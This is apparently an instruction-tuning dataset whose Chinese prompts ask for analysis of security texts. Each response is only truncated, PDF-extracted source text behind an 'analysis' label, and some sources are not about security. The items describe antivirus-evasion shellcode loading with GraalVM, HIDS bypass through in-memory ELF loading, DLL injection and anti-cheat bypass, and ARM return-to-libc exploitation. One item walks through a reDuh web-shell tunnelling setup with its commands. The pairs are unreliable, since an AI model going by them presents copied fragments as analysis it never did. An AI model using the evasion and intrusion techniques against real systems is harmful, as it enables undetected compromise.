{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nOlympic-sized Trunking http://www.signalharbor.com/ttt/01dec/index.html 1 of 8 6/18/2007 14:10 This article first appeared in the December 2001 issue of Monitoring Times. OLYMPIC-SIZED TRUNKING The 2002 Winter Olympic Games will begin on February 8, 2002, when more than two weeks of athletic events will take place in and around Salt Lake City, Utah. An estimated one and a half million spectators are expected to attend the Games. As you might imagine, radio will play a big part in the rapid, smooth and safe functioning of each event. This month I'll try to describe the major trunked radio networks that will be operating during the Olympics. As they have done many times in the past for such large events, the Federal Communications Commission has delegated the task of radio frequency management and coordination for the Games. The Salt Lake Organizing Committee (SLOC) will be the coordinator from December 1, 2001 through March 31, 2002, for the areas in and around Olympic activities. All broadcasters planning to work in one or more of the four radio zones (Salt Lake City, Park City, Ogden and Provo) are required to coordinate their use of radio frequencies through SLOC in order to operate any wireless audio and video, data communication, two-way or other radio equipment. Olympic-sized Trunking http://www.signalharbor.com/ttt/01dec/index.html 2 of 8 6/18/2007 14:10 Olympic-sized Trunking http://www.signalharbor.com/ttt/01dec/index.html 3 of 8 6/18/2007 14:10 Olympic Safety Besides broadcasters, public safety personnel will be very busy as well. The federal government has allocated about $200 million for security at the Olympic Winter Games, with the potential for more after the events of September 11. In addition, the State of Utah has contributed $35 million and the SLOC budget has more than $30 million earmarked for safety. The Secret Service is the lead agency for security planning. The FBI is tasked with intelligence gathering and law enforcement response, while the ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nInformation Visualization Survey http://www.cs.umd.edu/class/spring2001/cmsc838b/presentations/Beth_Weinstein/apt.ppt http://portal.acm.org/citation.cfm?id=260433&dl=ACM&coll=portal http://www.ee.ic.ac.uk/research/information/www/Bobs.html http://www.nickerson.to/visprog/ch7/IMG00049.GIF http://www.ee.ic.ac.uk/research/information/www/bi.gif http://web.media.mit.edu/~fviegas/circles/conversational_interface.html Chernoff, H. (1973). Using faces to represent points in k-dimensional space graphically. Journal of American Statistical Association, 68, 361-368. Chernoff, H., & Rizvi, M. H. (1975). Effect on classification error or random permutations of features in representing multivariate data by faces. Journal of American Statistical Association, 70, 548-554. http://www.bradandkathy.com/images/face.gif http://research.compaq.com/SRC/3D-animate/conetree.html http://www1.cs.columbia.edu/~paley/spring03/assignments/HW3/gwc2001/mountain.jpg http://davenation.com/doitree/doitree-avi-2002_files/image032.gif www.daimi.au.dk/~mackinla/iv-course/ sources/4-graphs.ppt http://class.ee.iastate.edu/berleant/home/Courses/text/TextVisualization/DocumentLens.jpg Robertson, G. G. and J. D. Mackinlay, The Document Lens, Proceedings of the Sixth Annual ACM Symposium on User Interface Software and Technology (UIST '93), Nov. 3--5, 1993, Atlanta, pp. 101--107. http://www.acm.org/sigchi/chi95/Electronic/documnts/videos/cw2_bdy.htm http://www.cc.gatech.edu/classes/AY2003/cs7450_spring/Students/a1/sumier.phalake/CS%207450assignment1_files/image006.jpg http://www.cs.umd.edu/hcil/excentric/ http://brisa.merl.com:8080/myezchooser/bargrams.pdf http://transcriptions.english.ucsb.edu/archive/colloquia/Kirshenbaum/filmfinder.gif http://www.cs.umd.edu/hcil/datelens/ http://citeseer.ist.psu.edu/furnas81fisheye.html http://www2.parc.com/istl/projects/fluid/ http://citeseer.ist.psu.edu/rennison94galaxy.html http://www.grokker.com/ http://www.xenky.com/news/ITBulletin_files/grokmap.jpg http://graphics.s", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTrustedsec ELFLoader 原理简析 0x01 简介 各类的 elfloader 一般都是内存解析或读取 elf 文件而后执行其中有简单的例如之前讲到的 Linux 无文件攻击姿势但是缺点也很明显例如 proc 特征无法保护 load 的文件今天分析 一个另一种类型的 eldloader简要分析一下是如何实现的项目为 trustedsec 出品 https://github.com/trustedsec/ELFLoader 0x02 Loader 技术细节 查看项目结构 主要功能实现逻辑都在 ELFLoader.c 中为了能跨平台运行可以看到做了一些适配性工作 将大部分类如输出打印字符处理等函数都放入了 beacon_compatibility.c 文件中 值得一提的是或许为了 opsec 考虑它将传参通过编码后传给 elfloader编码方式位于 beacon_generate.py 脚本中操作为对字符串先进行二进制格式打包后进行 hex 编码 参数传入 elfloader 后main 函数中读取 elf 文件并由 unhexlify()函数 decode 传入参数完 成后将 elf 文件及参数传入 ELFRunner()进行解析 elf 文件 进入函数后首先定义了一个结构体如上也是这个函数将要完成的主要功能即解析 elf 后 将对应节区存入对应结构体 而后判断传入的文件格式是否为 elf 格式是否为可重定位文件及系统位数之后即为两个 for 函数遍历节头表完成 elf 文件解析 如上在遍历过程中通过识别节区是否是存放符号表的节区而后进入循环寻找指定函数入 口点寻找方法是对比符号名找到后将地址赋给指针函数 PTR 最后通过指针直接调用 0x03 bof 插件细节 如上格式其他的 bof 文件也相同均以 go 函数作为入口为了方便调试可以看到下面还 有条件编译预留的 main 入口这里也可以不使用 go 作为入口修改下源码也可以指定其他 函数进行指针调用 0x04 集成方式 朋友提交了 issue工具很快就支持共享库(.so)了可方便的集成到自己的工具或马中 0x05 最后 从功能角度看该工具完成了 bof 思路在 linux 下的简单实现可有效绕过 hids 的 execve 监 控实现常见命令 bof 化 但该方式在 linux 平台来说还不是很优雅从使用角度看如果将这个 loader 改为远程加载 流量方面又没有了优势因为 bof 化本身大家都不想让文件落地而是在内存中执行那么每 次执行命令都不落地远程加载的话流量会太明显 如果从 execve 监控绕过方面看有其他方式更为简便如 busybox shell 或其他类型的 elfloader 来实现 最后实现一个好用的 linux 马越来越重要入口点的 shell 如果因为 hids 不小心掉了还是 很伤心的博取各种思路所长或改造或重写是更加好的选择", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWe are into helping others reach the security summit Andrew Gavin : Verizon Business Michael Baucom : N2 Net Security, Inc Charles Smith : N2 Net Security, Inc Brief recap of OpenDLP Goals of new Meterpreter feature Decisions behind using OpenDLP and Metasploit Architecture and changes Architecture and changes Live demos Post-Exploitation Nirvana:Launching OpenDLP Agents over Meterpreter Sessions 2 OpenDLP is a data discovery tool for filesystems and databases Free and open source (GPLv3) It has support for agent scanning (Windows) or agentless scanning (Windows/UNIX/DBs) or agentless scanning (Windows/UNIX/DBs) Uses profiles to scan systems/DBs:  Administrative credentials  Whitelist/blacklist files/directories  Regular expressions to use when searching for data Post-Exploitation Nirvana:Launching OpenDLP Agents over Meterpreter Sessions 3 Today will concentrate on agent scanning Old method:  User configures profile and enters list of IPs to scan  OpenDLP webapp pushes agent to Windows boxes over SMB over SMB  Agent starts as a Windows service at low priority  Agent scans directories/files based on profile  Agent phones home every X seconds with results  When agent is done, webapp uninstalls it  Can view results, mark false positives, export XML Live demo of agent scanning Post-Exploitation Nirvana:Launching OpenDLP Agents over Meterpreter Sessions 4 In order to deploy to multiple systems with a single profile, you must have domain admin credentials or the hash If you dont have domain admin credentials, you need to create a profile for each system you need to create a profile for each system with different passwords or hashes (must be a system account due to service interactions) Post-Exploitation Nirvana:Launching OpenDLP Agents over Meterpreter Sessions 5 Need to have the ability to search compromised machines for PII with or without having credentials The tool must have minimal impact on the users of the machines compromised users of the machines compromised The", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMarisa Fagan InfoSec Mentors Project DEF CON 2010 The InfoSec Mentors Project  Started May 2010  51 matches made so far  Based on volunteer interests and exp  To introduce people in the Information Security Community to people they might not otherwise get to meet.  World-wide participation What makes a good mentor?  Patience, enthusiasm, belief  Being an advocate  Recommendations to cut through the nonsense out there  Open doors What makes a good mentee?  Determination, Passion, Energy  Following through on suggestions  Add value to your mentor (Yes, you can!)  Maintain the relationship  Pay it forward Get involved!  www.infosecmentors.com  infosecmentors.blogspot.com  Pull up the newbies to a new level  Bring mentoring to your workplace  Make a difference!", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBad (and Sometimes Good) Tech Policy: It's Not Just a DC Thing Chris Conley ACLU of Northern California cconley@aclunc.org | @ManConley Chris Conley ACLU of Northern California cconley@aclunc.org | @ManConley", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nEmbedded System Design: From Electronics to Microkernel Development Rodrigo Maximiano Antunes de Almeida rmaalmeida@gmail.com @rmaalmeida Universidade Federal de Itajubá Portal embarcados The work Embedded System Design: From Electronics to Microkernel Development of Rodrigo Maximiano Antunes de Almeida was licensed with Creative Commons 3.0  Attribution  Non Commercial  Share Alike license. Additional permission can be given by the author through direct contact using the e-mail: rmaalmeida@gmail.com Creative Commons License Workshop schedule  Hardware Electronics introduction Board development  Firmware Embedded programming Peripheral access  Kernel Timing requirements Device drivers Hardware Hardware concepts  Electronics introduction Schematics Datasheets Protoboard/breadboard LED Potentiometer LCD Microcontroller  System design Basic steps Electronics introduction  http://xkcd.com/730/ Schematics  Way to represent the components and its connections  Each component has its own symbol  Crossing wires only are connected if joined with a dot Datasheets  The main source of information concerning electronics  Presents Electrical characteristics Simplified schematics Use example Opcodes/API Protoboard/Breadboard LED LED Potentiometer  Linear/Log  Used as voltage divisor  Need an analog input  Filter Potentiometer LCD Display LCD Display  Complete interface solution Screen + Video card + Protocol + Data cable  Standard HD44780 4/8 bits communication 3 control bits LCD Display  Backlight  Data connection  Current consumption  Power on time/routine Microcontroller  System-on-a-chip Processor Memory Input/Output peripherals Communication Safety components Microcontroller  Xtal configuration  Reset pin  DC needs  Many peripherals on the same pin System desing System design  Steps on a generic electronic system design Define the objective(s) Choose the main components needed to achieve the objective Get the use example and recommendations from component datasheet Build the s", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe Declaration of Hacker ( TDOH ) LegBone(腿骨) & Singo 為甚麼要講這個議程 腿骨說搞了這麼多年的bypass不來Hitcon 講一場 會很 幹 About Me Singo (TDOH中區召集人) 臺灣科技大學 資訊管理系 TDOH 2015 淺談逆向Android手遊 TDOH 2014 XSS新手初探之WorkShop TDOH 2013 資安基礎入門 Sitcon 2015 第一次查課程評價就上手(網路爬蟲) About TDOH 組織宗旨: 1. 培育更多資安人才 2. 推廣資安改變大眾對駭客的刻板映像 3. 讓駭客們不再孤單舉辦各種活動聚會網路論壇 4. 支援與聯合各學校社團讓資安文化深入學校並傳承下去 談談今天的內容之前 遊戲常用的保護方式分為R3和R0: - -R3俗稱應用層 - -R0俗稱內核層 Ring3Ring0是什麼? 能吃嗎?  不僅系統有R3R0之分  遊戲保護也有R3R0之分 先聊聊我寫的遊戲外掛~~ 學習了DirectX 3D透視 簡單說明 射擊遊戲 透視的原理 Hook DrawIndexedPrimitive函數 禁用Z軸緩衝 Hook EndScene 函數 這可以將人物上色之類的 也做了自動化的練功工具... BUT. 人生中最厲害的就是這個BUT 每當我們開啟遊戲時? 看到右下角跑出一個進度條 去你的驅動保護 沒關係. 於是我認識了腿骨 踏上了學習驅動之路 我要特別講一下. 在資安個圈子裡面 拜見強者的第一句話 請先加上大大 兩個字XD 2013年開始進行系統底層的研究 大概高2 還高3吧. 反-反外掛(防外掛機制) 矛盾大對決? 道高一尺魔高一丈 R3的保護方式分為: - -遊戲本身自帶的 - -額外包含進去的 談談R3常檢測的地方: FindWindow ProcessName PostMessage的Iparam,wparam檢測 反調試: DbgBreakPoint DbgUserBreakPoint DbgUiRemoteBreakin 反調試技術: DbgUiRemoteBreakin 所有線程會去呼叫DbgBreakPoint DbgBreakPoint 用來把當前的控制權交出去 Debugger就可以對他下int3斷點 DbgUserBreakPoint 長得和DbgBreakPoint一樣 談談某防掛廠商反調試的方式: 如果沒拔掉DbgUiRemoteBreakin的話: 反-反外掛: 修改ImagePath來偽裝成系統進程繞過檢測 有API HOOK的地方可以直接還原他的Hook (如果沒檢測Hook是否被還原的話 模塊隱藏: 斷開_PEB_LDR_DATA 底下的三個鏈表來達到模 塊隱藏 InLoadOrderModuleList InMemoryOrderModuleList InInitializationOrderModuleList 模塊隱藏: 模塊隱藏: 抹去PE標誌: 將此處填0即可 Signature=0; 介紹常用的DLL注入方式: 1. 註冊表注入 2. 遠線程注入 3. 白名單注入 4. 輸入法注入 .等等 註冊表注入: 利用系統的user32.dll啟動時會加載註冊表 AppInit_Dlls下所列出來的DLL根據這個原理可以將欲 注入的DLL路徑寫進AppInit_Dlls下來達成注入 引用至: http://blog.csdn.net/u013565525/article/details/28416279 遠線程注入: 遠線程注入的核心概念是利用Windows提供的遠線程機 制在目標進程中開啟一個加載DLL的遠線程使外掛 DLL被該遠線程所加載到遊戲的記憶體內 會用到的API有: OpenProcessGetProcAddressVirtualAllocEx WriteProcessMemory(WPM)CreateRemoteThread LoadLibrary 白名單注入: 原理是利用系統重要的進程來幫我們進行DLL的注入也就 是第三方注入 輸入法注入: 由於大多數的反外掛都阻止了外部程序讀取遊戲或注入遊 戲,但是卻有一個最重要的東西一定要載入遊戲就是輸 入法! 透過加載輸入法時的code在LoadLibrary的動作時,將我 們的動態鏈結庫加載進遊戲記憶體中來達到注入的效果! 注入的結論: 其實注入方式不只這些 只要能好好的將DLL注入進去就是好方法!!! - Rootkit Ring 0 TDOH-Singo TDOH-LegBone Singo Ring3 Ring0 windows ?.dll/exeOpenprocess kernel32.OpenProcess windo", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\naRgus d4yj4y sMURFBOy the Luna Correspondence Protocol The security of our world as we know it is at stake. The nature of our project may lend itself to abuse by malicious users, cooperate espionage, and even terrorism. More positive applications include freedom of speech and information under oppressive regimes, and personal privacy on a largely public network. Why Are We Here?  Secure, un-traceable, anonymous communication.  This is the Luna protocol.  This is our goal. Abstract  Luna is a revolutionary new protocol used to anonymously transmit and receive data securely across the Internet.  Luna is based on finite improbabilities of vast random data dispersal and exploits properties of IP to accomplish a portion of it's goals. Loki? Achieving Anonymity the Luna way Relaying Trickery  Luna makes use of well known and existing flaws in network protocols and conventional firewall implementations.  Luna uses tactics for which logging and filtering would be costly and impractical on high traffic relay hosts.  When properly implemented, Luna harms no host along its path, or impairs its bandwidth. Host-Level Transmission Relay 1 Relay 3 Relay 2 Transmitters Network Receivers Network Internet Host-Level Transmission Relay 3 Transmitters Network Receivers Network Internet Relay 1 Relay 2 Internet Host-Level Transmission Relay 1 Relay 2 Receivers Network Transmitters Network Relay 3 Internet Host-Level Transmission Receivers Network Transmitters Network Relay 3 Internet Host-Level Transmission Relay 1 Relay 2 Receivers Network Transmitters Network Internet Receivers Network Host-Level Transmission Relay 1 Relay 2 Relay 3 Transmitters Network Internet Receivers Network Host-Level Transmission Relay 1 Relay 2 Relay 3 Transmitters Network Several means of host deception are employed to facilitate anonymous transfer:  MAC Address Spoofing (ISO Layer 2)- Luna assumes multiple Media Access Control Addresses.  IP Address Spoofing (ISO Layer 3)- Luna bounces transmissions off a hi", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nlogname === 打印当前终端登录用户的名称 ## 概要 ```shell logname [OPTION]... ``` ## 主要用途 - 打印当前终端登录用户的名称 ## 选项 ```shell --help 显示帮助信息并退出 --version 显示版本信息并退出 ``` ## 返回值 返回0表示成功返回非0值表示失败 ## 例子 ```shell [root@localhost ~]# logname root ``` ### 注意 1. 注意区分 `whoami` 和 `logname` 这两个命令比如我们以用户 `root` 打开的终端然后切换到了用户 `user2`此时 `whoami`返回的是当前用户 `user2`, `logname` 返回的是 `root`大家可以自行实践验证一下 2. 该命令是`GNU coreutils`包中的命令相关的帮助信息请查看`man -s 1 logname``info coreutils 'logname invocation'`", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# ELK监控报警系统-elastalert [github地址](https://github.com/Yelp/elastalert/) ## elastalert安装 ``` # 操作系统Centos7 # 解决python依赖 yum install epel-release -y yum install python2-pip.noarch gcc.x86_64 python-devel.x86_64 libffi-devel.x86_64 git.x86_64 -y pip install --upgrade pip pip install \"setuptools>=11.3\" pip install \"elasticsearch>=5.0.0\" # 安装 git clone https://github.com/Yelp/elastalert.git cd elastalert/ && pip install -r requirements.txt python setup.py install ``` ## 使用 * **创建索引** ``` elastalert-create-index ``` * **测试规则文件** ``` elastalert-test-rule rule.yaml ``` * **启动监控报警** ``` python -m elastalert.elastalert --verbose --rule /root/elastalert/example_rules/rule.yaml ``` ### 以服务启动elastalert ``` mkdir /etc/elastalert cp /root/elastalert/config.yaml.example /etc/elastalert/config.yaml # 创建规则目录 mkdir /etc/elastalert/rules cp /root/elastalert/example_rules/example_frequency.yaml /etc/elastalert/rules/ cp /root/elastalert/example_rules/example_frequency.yaml /etc/elastalert/rules/rule.yaml # 修改配置文件 vim /etc/elastalert/config.yaml rules_folder: /etc/elastalert/rules # 创建elastalert服务文件 vim /etc/systemd/system/elastalert.service ``` elastalert.service文件内容 ``` [Unit] Description=elastalert After=elasticsearch.service [Service] Type=simple User=root Group=root Restart=on-failure WorkingDirectory=/opt ExecStart=/usr/bin/python -m elastalert.elastalert --config /etc/elastalert/config.yaml --rule /etc/elastalert/rules/rule.yaml Install] WantedBy=multi-user.target ``` 启动服务 ``` systemctl start elastalert.service ``` ### config.yaml配置文件说明 ``` rules_folder: /etc/elastalert/rules # 规则目录 run_every: # 多久从ES中查询一次 minutes: 1 es_host: 172.16.64.171 es_port: 9200 writeback_index: elastalert_status # elastalert索引名称 alert_time_limit: # 失败重试限制 days: 2 ``` ### 邮箱报警 ``` vim /etc/elastalert/rules/rule.yaml ``` rule.yaml文件内容 ``` es_host: 127.0.0.1 es_port: 9200 # 规则名字唯一值 name: security test # 报警类型参考印象笔记 type: any # es索引 index: logstash-* # 过滤 filter: - query: query_string: query: \"message:test\" # 报", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTechnique and bypassing defense mechanisms 07. 2010 STRI/Advance Technology Lab/Security Exploitation on ARM CONFIDENTIAL 2 # /usr/bin/whoami  Itzhak (Zuk) Avraham  Researcher at Samsung Electronics  Partner at PIA  Follow me on twitter under ihackbanme  Blog : http://imthezuk.blogspot.com  For any questions/talks/requests/whatever : CONFIDENTIAL 3 Presentation isnt enough  Get the full paper! Should be in the CDs under the name: Itzhak Zuk Avraham.*  This presentation and a full disclosure paper can be found at the following URL :  http://imthezuk.blogspot.com CONFIDENTIAL 4 Outline  [+] Exploitation on X86 vs. ARM  [+] ARM calling convention (APCS)  [+] Why simple ret2libc will not work?  [+] Understanding the vulnerable function  [+] Adjusting parameters  [+] Controlling the PC  [+] Ret2ZP (Return To Zero Protection) - For Local Attacker  [+] Ret2ZP (Return To Zero Protection) - Attack Explained in Depth (For Remote Attacker)  [+] Ret2ZP - Registers/Variable values injections.  [+] Ret2ZP - Using the attack to enable stack. # whoami root CONFIDENTIAL 5 Remote Local by Apps SMS/Calls Zombie Phone? More Privilege escalation Introduction - Why to hack into a phone? Zombie Phone? SMS/Calls Privilege escalation More Local by phone holder Privilege escalation CONFIDENTIAL 6 Stack based BO on X86/ARM  Current status on BO on X86  Stack/Heap is not executable  Stack cookies, ASLR, etc  On ARM?  Almost no protection.  Architecture is different.  Stack/Heap are not executable on most devices CONFIDENTIAL 7 X86 Ret2Libc Attack  Ret2LibC Overwrites the return address and pass parameters to vulnerable function.  [+] EBP+4 will store a function we want to call.  [+] EBP+8 Will store the exit function as its pushed to the called function.  [+] EBP+12 Will contain the pointer to the parameters we want to use on the called function.  Well use the system function, as its easy to use/understand and only get 1 parameter. CONFIDENTIAL 8 Why it wouldnt work on ARM?  In order to unders", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTactical Exploitation The Other Way to Pen-Test http://metasploit.com/confs/ H D Moore (hdm[at]metasploit.com) Valsmith (valsmith[at]metasploit.com) Last modified: 06/27/2007 Contents 1 Introduction 2 1.1 Abstract . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 1.2 Background . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 2 The Tactical Approach 3 2.1 Vulnerabilties . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3 2.2 Competition . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3 3 Information Discovery 4 3.1 Personnel Discovery . . . . . . . . . . . . . . . . . . . . . . . . . 4 3.1.1 Search Engines . . . . . . . . . . . . . . . . . . . . . . . . 4 3.1.2 Patervas Evolution . . . . . . . . . . . . . . . . . . . . . 5 3.2 Network Discovery . . . . . . . . . . . . . . . . . . . . . . . . . . 5 3.2.1 Discovery Services . . . . . . . . . . . . . . . . . . . . . . 5 3.2.2 Bounce Messages . . . . . . . . . . . . . . . . . . . . . . . 6 3.2.3 Virtual Hosting . . . . . . . . . . . . . . . . . . . . . . . . 7 3.2.4 Outbound DNS . . . . . . . . . . . . . . . . . . . . . . . . 8 3.2.5 Direct Contact . . . . . . . . . . . . . . . . . . . . . . . . 8 3.3 Firewalls and IPS . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 3.3.1 Firewall Identification . . . . . . . . . . . . . . . . . . . . 9 3.3.2 IPS Identification . . . . . . . . . . . . . . . . . . . . . . . 9 3.4 Application Discovery . . . . . . . . . . . . . . . . . . . . . . . . 9 3.4.1 Slow and Steady wins the Deface . . . . . . . . . . . . . . 10 3.4.2 Finding Web Apps with W3AF . . . . . . . . . . . . . . . 10 3.4.3 Metasploit 3 Discovery Modules . . . . . . . . . . . . . . 10 3.5 Client Application Discovery . . . . . . . . . . . . . . . . . . . . 10 3.5.1 Browser Fingerprinting . . . . . . . . . . . . . . . . . . . 11 3.5.2 Mail Client Fingerprinting . . . . . . . . . . . . . . . . . . 11 3.6 Process Discovery . . . . . . . . . . . . . . . . . . . . . . . . . ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nNo MAS: Mike Davis (misadventures in high security lock design) Introduction  I Hack stuff for IOActive Weird embedded stuff  Amateur lock picker Im not very good  Pretty good understanding of how the pixies flow  Im not interested in hacking one thing, I want to hack all of the things. 2 Todays plan  Were going to (try to) think like a lock vendor  Quick look at the evolution of High Security lock design and a look at the seemingly pervasive flaw that these design requirements and decisions lead to.  Look at how the same flaw keeps expressing itself.  Discuss responsible cdisclosure a bit 3 Design Requirements!  Lock  Electronic  Audit trail  Long lived power solution Replacing batteries isnt really an option.  Permissions systems not entirely related to physical possession of the key  Drop-in replacement for the traditional mechanisms. Mmm physical constraints  More secure-er then traditional (mechanical) designs! Because electronic! 4 Lock Design 6 Lock Design + Security 7 Cyberlock 8 As the CyberLock is directly powered through the communications port, it appears that an SPA (power analysis) attack may succeed against a CyberLock in-situ, as the lock leaks a significant power side-channel to any potential key as the processor slowly clocks the key across an I2C bus at the Fcpu/4 bps. However, this approach seems somewhat overboard given the existing issues. -IOActive Cyberlock Advistory Cyberlock  power hungry  I Hack stuff for IOActive 9 Some lessons learned  Pluses Drop in replacements for classical design Locks dont need batteries Audit trails and permission systems  Minuses Bullshit crypto Reliant on external power Could not be fixed 10 A Quick Tangent 11 Yet Another Design  I Hack stuff for IOActive 12 Some lessons learned  Pluses Cheap Battery failure doesnt kill safe  Minuses Still reliant on external power Introduction of secondary side-channels (beep) 13 Another quick Tangent 14 15 So, heres where the money is stored in an ATM, as you can see it's prote", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n利用GraalVM实现免杀加载器 2022-09-16  红蓝对抗 起因是与NoOne想围观一下CS47又整了些什么反破解操作发现 TeamServerImage 套了个GraalVM贴一段官 网的介绍以及如何看待乎的链接 如何评价 GraalVM 这个项目 性能优化就不说了关键它支持多种主流语言的JIT和Java的AOT也就是可以编译成不依赖外部JRE的 PE/ELF大家有没有想起些什么 精简JRE,打造无依赖的Java-ShellCode-Loader Mr6师傅通过将精简JRE与JavaShellCodeLoader打包的方式实现了免杀良好的加载器GraalVM则是将class 编译为了机器码一般不用再单独打包且性能更好Elegant, Very elegant 如何整活 1. 跟着官方文档安装好CE版本 core 和 native-image 也可以从Oracle下EE版本 2. 准备好需要的编译环境 3. 正常编写java并编译为class 4. 通过 native-image YourClass 编译为PE/ELF 注意上文说了一般写个Runtime执行命令自然没有问题但如果用到了反射等动态特性就得引入它的 agent执行class让它分析一下生成几个后面 native-image 会用到的配置文件 Introducing the Tracing Agent: Simplifying GraalVM Native Image Configuration 不过反正我抄出来的JavaShellCodeLoader这样子干它是分析不出的 在没提供额外配置且用到了反射时 native-image 会编译为 fallback image 需要把class文件和PE/ELF放 一起才可以正常执行虽然可以用enigmavb打包解决还是希望会的师傅指点一下我怎么原生编译出来Orz Get started with GraalVM  is a high-performance JDK designed to accelerate Java application performance while consuming fewer resources. GraalVM offers two ways to run Java applications: on the HotSpot JVM with Graal just-in-time (JIT) compiler or as an ahead-of-time (AOT) compiled native executable. Besides Java, it provides runtimes for JavaScript, Ruby, Python, and a number of other popular languages. GraalVMʼs polyglot capabilities make it possible to mix programming languages in a single application while eliminating any foreign language call costs. 1 2 mkdir -p META-INF/native-image $JAVA_HOME/bin/java -agentlib:native-image-agent=config-output-dir=META-INF/native-image Hell Bash 另一个问题是在Linux编译时默认会依赖libc出于兼容考虑应该可以在很老的系统上编译或者跟着文档准 备好环境通过 --static --libc=musl 参数静态打包 我因为一些库本来就有或是通过 pamac 装上了没完全按步骤走然后报错了似乎是把 -lz 参数当成文件 最终效果 VT几乎全过相信我那一个红的是误报2333 原生shellcode就能过defender不过瞎捣鼓还是有几率被杀", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n**reDuh简介** reDuh是sensepost由2008-07年发布从本质上讲可以将JSP/PHP/ASP/ASPX等页面上传到目标服务器便可以访问该服务器后面的主机 BlackHat USA 2008介绍 https://drive.google.com/open?id=1AqmtuBnHQJS-FjVHzJMNNWokda048By- Github https://github.com/sensepost/reDuh **攻击机** 192.168.1.5 Debian 192.168.1.4 Windows 7 **靶机** 192.168.1.119 Windows 2003 **安装** ```bash root@John:~# git clone https://github.com/sensepost/reDuh.git Cloning into 'reDuh'... remote: Enumerating objects: 47, done. remote: Total 47 (delta 0), reused 0 (delta 0), packreused 47 Unpacking objects: 100% (47/47), done. root@John:~# cd reDuh/ root@John:~/reDuh# ls README.markdown reDuhClient reDuhServers ``` ![](media/1baa9c1874d47e57ff19724c1e050dd8.jpg) **靶机执行** 以aspx为demo ![](media/853cde273f8ee0873156e9c624258201.jpg) **攻击机执行** 绑定端口 ```bash root@John:~/reDuh/reDuhClient/dist# java jar reDuhClient.jar http://192.168.1.119/reDuh.aspx [Info]Querying remote web page for usable remote service port [Info]Remote RPC port chosen as 42000 [Info]Attempting to start reDuh from 192.168.1.119:80/reDuh.aspx. Using service port 42000. Please wait... [Info]reDuhClient service listener started on local port 1010 ``` ![](media/2596f6edba3d76db9a416b2011e8fb9b.jpg) 开启新terminal建立隧道 命令如下 [createTunnel][本地绑定端口]: 127.0.0.1:[远程端口] ```bash root@John:~# telnet 127.0.0.1 1010 Trying 127.0.0.1... Connected to 127.0.0.1. Escape character is ']'. Welcome to the reDuh command line >>[createTunnel]30080:127.0.0.1:80 Successfully bound locally to port 30080. Awaiting connections. ``` ![](media/9a14208cab4886588559a38d694a5cf1.jpg) 攻击机端口前后对比 ```bash root@John:~# netstat ntlp Active Internet connections (only servers) Proto RecvQ SendQ Local Address Foreign Address State PID/Program na me tcp 0 0 0.0.0.0:902 0.0.0.0:* LISTEN 809/vmwareauthdlau tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 674/sshd tcp6 0 0 :::902 :::* LISTEN 809/vmwareauthdlau tcp6 0 0 :::22 :::* LISTEN 674/sshd root@John:~# netstat ntlp Active Internet connections (only servers) Proto RecvQ SendQ Local Address Foreign Addre", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n-[ Past and Future in OS X Malware ]- 1 Who Am I  An Economist and MBA.  Computer enthusiast for the past 30 years.  Someone who worked at one of the worlds best ATM networks, the Portuguese Multibanco.  A natural-born reverser and assembler of all kinds of things, not just bits & bytes. 2 Whos noar  Self-taught researcher.  Consultant / Insultant in security software.  Former Apple BlackOps.  Uses a Mac since AAPL was $12.  Bought no shares at that time!  Never pwned, although he dares to open my PowerPoint files. 3 Objective  Starting point: Macs are immune to malware.  Latest Flashback variants broke THE myth.  In fact, its quite easy to write high quality OS X malware!  Thats what I want to demonstrate today. 4 Summary  OS X malware history.  Flashback, the mythbuster.  Code injection techniques.  OS.X/Boubou  A PoC infector/virus.  Privilege escalation.  Final remarks. 5 History  From lamware to malware History & glory are not made of:  Backdoors written in REALBasic.  Old IRC bots.  Keyloggers that use Universal Access (logKext rules them all).  PoCs (except mine!). 6 History  Lamware, 2006 Oompa Loompa  Spread via iChat Bonjour buddy list.  Injection into Cocoa apps using Input Managers.  Requires user interaction to execute it. 7 History  Lamware, 2006 Opener 3.9  Same old shell script as a startup item.  The usual trojan horse toolbag:  Hidden admin user (UID < 501), enable SSH, AFP, SMB.  Data mining, hash cracking (JtR), logs cleaning.  New features:  Anti-Little Snitch prequel, anti-virus white-listing.  Capture network traffic using dsniff. 8 History  Lamware, 2007 RSPlug aka DNSChanger  First fake codec package.  Prepend 